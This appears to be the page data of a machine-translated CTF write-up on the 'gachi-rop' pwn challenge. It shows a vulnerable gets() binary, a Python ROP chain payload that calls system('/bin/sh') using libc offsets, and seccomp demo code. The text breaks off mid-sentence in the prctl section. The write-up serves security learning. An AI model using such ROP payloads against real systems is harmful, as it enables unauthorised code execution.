{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-pwn-gachi-rop-en","result":{"data":{"markdownRemark":{"id":"9a78a01c-a2a0-5056-a71c-a1696f15de92","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/ctf-pwn-gachi-rop\">original page</a>.</p>\n</blockquote>\n<p>I’m currently studying Pwn.</p>\n<p>Following the previous article <a href=\"/ctf-pwn-og-en\">A Beginner CTFer’s Pwn Crash Course 1 - FSB Basics and ROP Techniques -</a>, this time I’ll use the “gachi-rop” challenge from sec4b 2024 as a theme to summarize seccomp bypass techniques and Shell Code basics for beginner Pwn players.</p>\n<h2 id=\"table-of-contents\" style=\"position:relative;\">Table of Contents</h2>\n<ul>\n<li><a href=\"#problem-overview-gachi-rop-pwn\">Problem Overview: gachi-rop (Pwn)</a></li>\n<li>\n<p><a href=\"#seccomp-overview-and-implementation\">seccomp Overview and Implementation</a></p>\n<ul>\n<li><a href=\"#implementing-seccomp-in-strict-mode\">Implementing seccomp in Strict Mode</a></li>\n<li><a href=\"#implementing-seccomp-bpf-with-libseccomp\">Implementing seccomp-bpf with libseccomp</a></li>\n<li><a href=\"#implementing-seccomp-bpf-with-prctl\">Implementing seccomp-bpf with prctl</a></li>\n<li><a href=\"#using-seccomp-tools\">Using seccomp-tools</a></li>\n<li><a 
href=\"#checking-the-challenge-binarys-seccomp-filter\">Checking the Challenge Binary’s seccomp Filter</a></li>\n</ul>\n</li>\n<li>\n<p><a href=\"#bypassing-seccomp\">Bypassing seccomp</a></p>\n<ul>\n<li><a href=\"#using-alternative-system-calls\">Using Alternative System Calls</a></li>\n<li><a href=\"#abusing-ptrace\">Abusing ptrace</a></li>\n<li><a href=\"#bypass-using-32-bit-system-calls\">Bypass Using 32-bit System Calls</a></li>\n<li><a href=\"#seccomp-bypass-using-32-bit-abi\">seccomp Bypass Using 32-bit ABI</a></li>\n</ul>\n</li>\n<li><a href=\"#about-execve-and-execveat\">About execve and execveat</a></li>\n<li>\n<p><a href=\"#shell-code-introduction\">Shell Code Introduction</a></p>\n<ul>\n<li><a href=\"#creating-a-shell-code\">Creating a Shell Code</a></li>\n<li><a href=\"#executing-a-program-with-execveat\">Executing a Program with execveat</a></li>\n<li><a href=\"#reading-and-printing-file-contents-with-openreadwrite\">Reading and Printing File Contents with open/read/write</a></li>\n<li><a href=\"#browsing-directory-entries-with-getdents\">Browsing Directory Entries with getdents</a></li>\n<li><a href=\"#bypassing-nx-with-mprotect\">Bypassing NX with mprotect</a></li>\n<li><a href=\"#generating-shell-code-with-shellcraft\">Generating Shell Code with shellcraft</a></li>\n<li><a href=\"#other-shell-code-samples\">Other Shell Code Samples</a></li>\n</ul>\n</li>\n<li>\n<p><a href=\"#solution-1-output-file-data-and-retrieve-the-flag\">Solution 1: Output File Data and Retrieve the Flag</a></p>\n<ul>\n<li><a href=\"#granting-execute-permission-with-mprotect\">Granting Execute Permission with mprotect</a></li>\n<li><a href=\"#embedding-a-payload-at-an-arbitrary-address\">Embedding a Payload at an Arbitrary Address</a></li>\n<li><a href=\"#executing-the-embedded-shell-code\">Executing the Embedded Shell Code</a></li>\n</ul>\n</li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"problem-overview-gachi-rop-pwn\" style=\"position:relative;\">Problem Overview: gachi-rop (Pwn)</h2>\n<blockquote>\n<p>Bored of One Gadgets already? Welcome to the world of gachi-ROP!</p>\n</blockquote>\n<p>Reading the provided Dockerfile, we can see that <code class=\"language-text\">flag.txt</code> is placed in the <code class=\"language-text\">ctf4b</code> directory and renamed with the MD5 hash of its contents appended, which makes the file name unguessable:</p>\n<div class=\"gatsby-highlight\" data-language=\"dockerfile\"><pre class=\"language-dockerfile\"><code class=\"language-dockerfile\"><span class=\"token instruction\"><span class=\"token keyword\">FROM</span> ubuntu:22.04@sha256:2af372c1e2645779643284c7dc38775e3dbbc417b2d784a27c5a9eb784014fb8 <span class=\"token keyword\">AS</span> base</span>\n<span class=\"token instruction\"><span class=\"token keyword\">WORKDIR</span> /app</span>\n<span class=\"token instruction\"><span class=\"token keyword\">COPY</span> gachi-rop run</span>\n<span class=\"token instruction\"><span class=\"token keyword\">COPY</span> flag.txt /flag.txt</span>\n<span class=\"token instruction\"><span class=\"token keyword\">RUN</span> mkdir ctf4b</span>\n<span class=\"token instruction\"><span class=\"token keyword\">RUN</span>  mv /flag.txt ctf4b/flag-$(md5sum /flag.txt | awk <span class=\"token string\">'{print $1}'</span>).txt</span>\n\n<span class=\"token instruction\"><span class=\"token keyword\">FROM</span> 
pwn.red/jail</span>\n<span class=\"token instruction\"><span class=\"token keyword\">COPY</span> <span class=\"token options\"><span class=\"token property\">--from</span><span class=\"token punctuation\">=</span><span class=\"token string\">base</span></span> / /srv</span>\n<span class=\"token instruction\"><span class=\"token keyword\">RUN</span> chmod +x /srv/app/run</span>\n<span class=\"token instruction\"><span class=\"token keyword\">ENV</span> JAIL_TIME=60 JAIL_CPU=100 JAIL_MEM=10M</span></code></pre></div>\n<p>The directory structure is as follows. Since guessing the file name is impractical, the basic strategy is either to obtain a shell via exploitation, or to identify the flag file name somehow and leak its contents.</p>\n<p><img src=\"/static/5ffc9e220dbe9208450b2cc4b081383a/69476/image-20240616185938530.png\" alt=\"image-20240616185938530\"></p>\n<p>Decompiling the challenge binary shows that it leaks the address of libc’s <code class=\"language-text\">system</code> at startup:</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\">int32_t main(int32_t argc, char** argv, char** envp)\n{\n    install_seccomp();\n    printf(\"system@%p\\n\", system);\n    int64_t buf = 0;\n    int64_t var_10 = 0;\n    printf(\"Name: \");\n    gets(&amp;buf);\n    printf(\"Hello, gachi-rop-%s!!\\n\", &amp;buf);\n    return 0;\n}</code></pre></div>\n<p>There is also an obvious stack buffer overflow through <code class=\"language-text\">gets</code>, and protections such as Canary and PIE are disabled, so a ROP chain exploit should be relatively straightforward.</p>\n<p><img src=\"/static/4eced87434f30787a15bf39dceb80964/898f6/image-20240616185455256.png\" alt=\"image-20240616185455256\"></p>\n<p>I tried sending the following typical ROP chain payload to obtain a shell:</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token comment\"># Exploit</span>\nr <span class=\"token operator\">=</span> target<span class=\"token punctuation\">.</span>recvuntil<span class=\"token punctuation\">(</span><span class=\"token string\">b\"Name: \"</span><span class=\"token punctuation\">)</span>\n\nsystem_addr <span class=\"token operator\">=</span> <span class=\"token builtin\">int</span><span class=\"token punctuation\">(</span>r<span class=\"token punctuation\">.</span>decode<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token 
string\">\"\\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">0</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span>split<span class=\"token punctuation\">(</span><span class=\"token string\">\"@\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">1</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span><span class=\"token number\">16</span><span class=\"token punctuation\">)</span>\nlibc_baseaddress <span class=\"token operator\">=</span> system_addr <span class=\"token operator\">-</span> <span class=\"token number\">0x50d70</span>\nbinsh_addr <span class=\"token operator\">=</span> libc_baseaddress <span class=\"token operator\">+</span> <span class=\"token number\">0x1d8678</span>\npop_rdi_ret <span class=\"token operator\">=</span> libc_baseaddress <span class=\"token operator\">+</span> <span class=\"token number\">0x001bbea1</span>\nret <span class=\"token operator\">=</span> <span class=\"token number\">0x4012fc</span>\n\npayload <span class=\"token operator\">=</span> flat<span class=\"token punctuation\">(</span>\n    <span class=\"token string\">b\"A\"</span><span class=\"token operator\">*</span><span class=\"token number\">0x10</span> <span class=\"token operator\">+</span> <span class=\"token string\">b\"B\"</span><span class=\"token operator\">*</span><span class=\"token number\">8</span><span class=\"token punctuation\">,</span>\n    pop_rdi_ret<span class=\"token punctuation\">,</span>\n    binsh_addr<span class=\"token punctuation\">,</span>\n    ret<span class=\"token punctuation\">,</span>\n    system_addr\n<span class=\"token punctuation\">)</span>\ntarget<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span></code></pre></div>\n<p>However, even 
though this payload successfully executes the <code class=\"language-text\">system</code> function with <code class=\"language-text\">/bin/sh</code> as its argument, it does not yield a shell.</p>\n<p>Running the exploit under strace shows that the process is terminated as soon as the <code class=\"language-text\">execve</code> system call is issued with <code class=\"language-text\">/bin/sh</code> as its argument:</p>\n<p><img src=\"/static/4f1f8f77c7e16209add8b024f7f0c3a7/d9199/image-20240618205240678.png\" alt=\"image-20240618205240678\"></p>\n<p>This is because the process is protected by a seccomp filter that the <code class=\"language-text\">install_seccomp</code> function installs at the start of <code class=\"language-text\">main</code>.</p>\n<p>In fact, if the binary is patched to skip <code class=\"language-text\">install_seccomp</code>, the same payload obtains a shell:</p>\n<p><img src=\"/static/6f704a4051aea2059ca8e021df097980/d9199/image-20240618204908173.png\" alt=\"image-20240618204908173\"></p>\n<p>From the above, the basic strategy for this challenge is either to lift the seccomp restriction or to build a ROP chain that retrieves the flag using only the permitted system calls.</p>\n<h2 id=\"seccomp-overview-and-implementation\" style=\"position:relative;\">seccomp Overview and Implementation</h2>\n<p>seccomp (secure computing mode) is a Linux kernel mechanism that restricts the system calls a process is allowed to issue.</p>\n<p>Once a process has enabled seccomp on itself, issuing a system call that the policy does not permit causes the kernel to terminate the process.</p>\n<p>seccomp was first introduced in Linux kernel 2.6.12, and the more flexible seccomp-bpf was added in Linux kernel 3.5.</p>\n<p>The original seccomp is called Strict mode: it allows only four system calls, <code class=\"language-text\">read</code> and <code class=\"language-text\">write</code> on already-open file descriptors, <code class=\"language-text\">exit</code>, and <code class=\"language-text\">sigreturn</code>, and blocks everything else.</p>\n<p>The more flexible seccomp-bpf instead checks each system call against a filter expressed as a Berkeley Packet Filter (BPF) 
program.</p>\n<p>Reference: <a href=\"https://www.kernel.org/doc/html/v4.19/userspace-api/seccomp_filter.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Seccomp BPF (Secure Computing with Filters) — The Linux Kernel documentation</a></p>\n<h3 id=\"implementing-seccomp-in-strict-mode\" style=\"position:relative;\">Implementing seccomp in Strict Mode</h3>\n<p>Let’s confirm that <code class=\"language-text\">execve</code> fails when Strict mode seccomp is enabled with <code class=\"language-text\">prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT);</code>:</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;fcntl.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdio.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;unistd.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token 
directive keyword\">include</span> <span class=\"token string\">&lt;string.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;linux/seccomp.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;sys/prctl.h></span></span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n    <span class=\"token comment\">// prctl(PR_SET_SECCOMP=0x16, SECCOMP_MODE_STRICT=1);</span>\n    <span class=\"token function\">prctl</span><span class=\"token punctuation\">(</span>PR_SET_SECCOMP<span class=\"token punctuation\">,</span> SECCOMP_MODE_STRICT<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token comment\">// argv must be a NULL-terminated array of pointers</span>\n    <span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>args<span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span> <span class=\"token string\">\"/bin/echo\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"After enable seccomp.\"</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span> <span class=\"token punctuation\">}</span><span class=\"token punctuation\">;</span>\n    <span class=\"token comment\">// killed here: execve is not in the Strict mode allow-list</span>\n    <span class=\"token function\">execve</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"/bin/echo\"</span><span class=\"token punctuation\">,</span> args<span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>Reference: <a href=\"https://docs.huihoo.com/doxygen/linux/kernel/3.7/include_2uapi_2linux_2seccomp_8h.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Linux Kernel: include/uapi/linux/seccomp.h File Reference</a></p>\n<p>Reference: <a href=\"https://github.com/spotify/linux/blob/master/include/linux/prctl.h\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">linux/include/linux/prctl.h at master · spotify/linux</a></p>\n<p>Compiling and running this code confirms that the process is killed by SIGKILL when it tries to execute the <code class=\"language-text\">execve</code> system call:</p>\n<p><img src=\"/static/0ee175e14f41725ecf75677f3f330566/d9199/image-20240618230141319.png\" alt=\"image-20240618230141319\"></p>\n<h3 id=\"implementing-seccomp-bpf-with-libseccomp\" style=\"position:relative;\">Implementing seccomp-bpf with libseccomp</h3>\n<p>Next, let’s implement seccomp-bpf using <code class=\"language-text\">seccomp_rule_add</code> from libseccomp.</p>\n<p>The code is taken directly from the following sample on <a href=\"https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/seccomp\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">HackTricks</a>.</p>\n<p><code class=\"language-text\">seccomp_rule_add</code> is a libseccomp function that adds a rule to a filter, which makes seccomp filters considerably easier to write than raw BPF.</p>\n<p>Reference: <a href=\"https://github.com/seccomp/libseccomp\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">seccomp/libseccomp: The main libseccomp repository</a></p>\n<p>Reference: <a href=\"https://manpages.ubuntu.com/manpages/focal/en/man3/seccomp_rule_add.3.html\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Ubuntu Manpage: seccomp_rule_add, seccomp_rule_add_exact - Add a seccomp filter rule</a></p>\n<p>When using this library, link against it with <code class=\"language-text\">-lseccomp</code> at compile time, e.g. 
<code class=\"language-text\">gcc main.c -lseccomp</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;seccomp.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;unistd.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdio.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;errno.h></span></span>\n\n<span class=\"token comment\">//https://security.stackexchange.com/questions/168452/how-is-sandboxing-implemented/175373</span>\n<span class=\"token comment\">//gcc seccomp_bpf.c -o seccomp_bpf -lseccomp</span>\n\n<span class=\"token keyword\">void</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">void</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n  <span class=\"token comment\">/* initialize the libseccomp context */</span>\n  scmp_filter_ctx ctx <span class=\"token operator\">=</span> <span class=\"token function\">seccomp_init</span><span class=\"token punctuation\">(</span>SCMP_ACT_KILL<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  \n  <span class=\"token comment\">/* allow exiting */</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Adding rule : Allow exit_group\\n\"</span><span class=\"token 
punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">seccomp_rule_add</span><span class=\"token punctuation\">(</span>ctx<span class=\"token punctuation\">,</span> SCMP_ACT_ALLOW<span class=\"token punctuation\">,</span> <span class=\"token function\">SCMP_SYS</span><span class=\"token punctuation\">(</span>exit_group<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  \n  <span class=\"token comment\">/* allow getting the current pid */</span>\n  <span class=\"token comment\">//printf(\"Adding rule : Allow getpid\\n\");</span>\n  <span class=\"token comment\">//seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(getpid), 0);</span>\n  \n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Adding rule : Deny getpid\\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">seccomp_rule_add</span><span class=\"token punctuation\">(</span>ctx<span class=\"token punctuation\">,</span> <span class=\"token function\">SCMP_ACT_ERRNO</span><span class=\"token punctuation\">(</span>EBADF<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token function\">SCMP_SYS</span><span class=\"token punctuation\">(</span>getpid<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token comment\">/* allow changing data segment size, as required by glibc */</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Adding rule : Allow brk\\n\"</span><span class=\"token 
punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">seccomp_rule_add</span><span class=\"token punctuation\">(</span>ctx<span class=\"token punctuation\">,</span> SCMP_ACT_ALLOW<span class=\"token punctuation\">,</span> <span class=\"token function\">SCMP_SYS</span><span class=\"token punctuation\">(</span>brk<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  \n  <span class=\"token comment\">/* allow writing up to 512 bytes to fd 1 */</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Adding rule : Allow write upto 512 bytes to FD 1\\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">seccomp_rule_add</span><span class=\"token punctuation\">(</span>ctx<span class=\"token punctuation\">,</span> SCMP_ACT_ALLOW<span class=\"token punctuation\">,</span> <span class=\"token function\">SCMP_SYS</span><span class=\"token punctuation\">(</span>write<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token number\">2</span><span class=\"token punctuation\">,</span>\n    <span class=\"token function\">SCMP_A0</span><span class=\"token punctuation\">(</span>SCMP_CMP_EQ<span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>\n    <span class=\"token function\">SCMP_A2</span><span class=\"token punctuation\">(</span>SCMP_CMP_LE<span class=\"token punctuation\">,</span> <span class=\"token number\">512</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  \n  <span class=\"token comment\">/* 
if writing to any other fd, return -EBADF */</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Adding rule : Deny write to any FD except 1 \\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">seccomp_rule_add</span><span class=\"token punctuation\">(</span>ctx<span class=\"token punctuation\">,</span> <span class=\"token function\">SCMP_ACT_ERRNO</span><span class=\"token punctuation\">(</span>EBADF<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token function\">SCMP_SYS</span><span class=\"token punctuation\">(</span>write<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span>\n    <span class=\"token function\">SCMP_A0</span><span class=\"token punctuation\">(</span>SCMP_CMP_NE<span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  \n  <span class=\"token comment\">/* load and enforce the filters */</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Load rules and enforce \\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">seccomp_load</span><span class=\"token punctuation\">(</span>ctx<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token function\">seccomp_release</span><span class=\"token punctuation\">(</span>ctx<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token comment\">//Get the getpid is denied, a weird number will be returned 
like</span>\n  <span class=\"token comment\">//this process is -9</span>\n  <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"this process is %d\\n\"</span><span class=\"token punctuation\">,</span> <span class=\"token function\">getpid</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>Reference: <a href=\"https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/seccomp\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Seccomp | HackTricks | HackTricks</a></p>\n<p>Compiling and running this code confirms that <code class=\"language-text\">getpid</code> fails due to seccomp-bpf. (Unlike Strict mode, which kills the process with SIGKILL on any disallowed call, the rule for <code class=\"language-text\">getpid</code> here uses <code class=\"language-text\">SCMP_ACT_ERRNO(EBADF)</code>, so the blocked call only returns an error and the process keeps running. A seccomp-bpf filter can still kill: the default action <code class=\"language-text\">SCMP_ACT_KILL</code> passed to <code class=\"language-text\">seccomp_init</code> does exactly that for any system call without a matching rule.)</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 638px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/1beffd969817fba58a2bb216a52f3527/41be6/image-20240619200854256.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 25.416666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA20lEQVQY041Qy5KCMBAMFodlIYAQTHjlgSAIBt3i/7+tN+DVg4eurpqafsyQdigg78whAzcUrKLglcKl1mjMCHkdwUqJ6MwRpgw0Ew784ICekeQCYRgiTVPESQyybRvsY8VtGCFEibZpYdcF1i7o+w6/wQ9OJw+EkO9wnycMtx5StWAsBysYumsHrRW4cE1iijx/z3dkeXa0SZLks+Hr74mHazNNI+qmdmYG69NiXmaIUqCqKxcmXXsO5UKUdudHEXzf/2yojTpExuiDd2FxKRAEwddn7rue937LP0bveFKiLRihAAAAAElFTkSuQmCC'); background-size: cover; 
display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/1beffd969817fba58a2bb216a52f3527/8ac56/image-20240619200854256.webp 240w,\n/static/1beffd969817fba58a2bb216a52f3527/d3be9/image-20240619200854256.webp 480w,\n/static/1beffd969817fba58a2bb216a52f3527/a2d8a/image-20240619200854256.webp 638w\"\n              sizes=\"(max-width: 638px) 100vw, 638px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/1beffd969817fba58a2bb216a52f3527/8ff5a/image-20240619200854256.png 240w,\n/static/1beffd969817fba58a2bb216a52f3527/e85cb/image-20240619200854256.png 480w,\n/static/1beffd969817fba58a2bb216a52f3527/41be6/image-20240619200854256.png 638w\"\n            sizes=\"(max-width: 638px) 100vw, 638px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/1beffd969817fba58a2bb216a52f3527/41be6/image-20240619200854256.png\"\n            alt=\"image-20240619200854256\"\n            title=\"image-20240619200854256\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/7a9575f93f717e74e475d17c01671a5d/d6a46/image-20240619200923008.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 38.33333333333333%; position: relative; bottom: 0; left: 0; background-image: 
url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABJElEQVQoz31R2W6DMBDkSBBgYhuwwSlpgUht//8LpzsbRU3VNg8jY3aZiyyEEcQ0TWjbFn3fYxwHTPOEfujl7pHSDO8dulOHUXZvOyPyPEeWZT8xy4ckmOcZrWkxyPP5nGCtRYwRy2VB13U4CVlKSc7Tb5JHxCnCi4sQAuqmhnMWTtxYOb33qOtaBemUDnknuekMjDEq1jSNnmVZIGPUQaLRjaHDYVBy55zieDyqY8amCMHYFOWcQqygqqqbQ3bFAZe8Dr0uU513irBbRuW7e7SiKBR5kYuz8jvyx+c71u0N277het2RxA1/BrtkHXRP0RgDgoBJrH3S47av2hGX2NG9H7omweX1gmV5URFNIrvs9l9Cutq2VWOy8Mfh4XB4/kf/wBfrV7ZCm9jKSgAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/7a9575f93f717e74e475d17c01671a5d/8ac56/image-20240619200923008.webp 240w,\n/static/7a9575f93f717e74e475d17c01671a5d/d3be9/image-20240619200923008.webp 480w,\n/static/7a9575f93f717e74e475d17c01671a5d/e46b2/image-20240619200923008.webp 960w,\n/static/7a9575f93f717e74e475d17c01671a5d/6e1e4/image-20240619200923008.webp 1008w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/7a9575f93f717e74e475d17c01671a5d/8ff5a/image-20240619200923008.png 240w,\n/static/7a9575f93f717e74e475d17c01671a5d/e85cb/image-20240619200923008.png 480w,\n/static/7a9575f93f717e74e475d17c01671a5d/d9199/image-20240619200923008.png 960w,\n/static/7a9575f93f717e74e475d17c01671a5d/d6a46/image-20240619200923008.png 1008w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/7a9575f93f717e74e475d17c01671a5d/d9199/image-20240619200923008.png\"\n            alt=\"image-20240619200923008\"\n            title=\"image-20240619200923008\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    
</span></p>\n<h3 id=\"implementing-seccomp-bpf-with-prctl\" style=\"position:relative;\"><a href=\"#implementing-seccomp-bpf-with-prctl\" aria-label=\"implementing seccomp bpf with prctl permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Implementing seccomp-bpf with prctl</h3>\n<p>libseccomp is a library for implementing complex seccomp-bpf filters more easily. Without it, you can also implement seccomp-bpf directly using prctl.</p>\n<p>When configuring seccomp-bpf with prctl, use the following code:</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token function\">prctl</span><span class=\"token punctuation\">(</span>PR_SET_SECCOMP<span class=\"token punctuation\">,</span> SECCOMP_MODE_FILTER<span class=\"token punctuation\">,</span> prog<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>To configure seccomp-bpf, the second argument is <code class=\"language-text\">SECCOMP_MODE_FILTER</code> (not <code class=\"language-text\">SECCOMP_MODE_STRICT</code>).</p>\n<p>Unlike Strict mode, the third argument <code class=\"language-text\">prog</code> receives a pointer to a <code class=\"language-text\">struct 